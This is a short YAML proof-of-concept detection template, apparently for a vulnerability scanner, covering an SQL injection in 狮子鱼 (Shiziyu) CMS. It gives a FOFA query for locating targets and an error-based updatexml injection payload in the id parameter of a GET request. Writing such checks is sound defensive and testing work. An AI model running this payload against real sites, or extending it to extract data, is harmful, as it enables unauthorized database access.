漏洞描述
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞
fofa-query: "/seller.php?s=/Public/login"
id: shiziyu-cms-apigood-controller-sql-injection
info:
name: 狮子鱼CMS ApigoodController.class.php SQL注入漏洞
author: daffainfo
severity: critical
description: |
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞
fofa-query: "/seller.php?s=/Public/login"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS%20ApigoodController.class.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
set:
rand: randomInt(200000000, 210000000)
rules:
r0:
request:
method: GET
path: /index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)
expression: response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
expression: r0()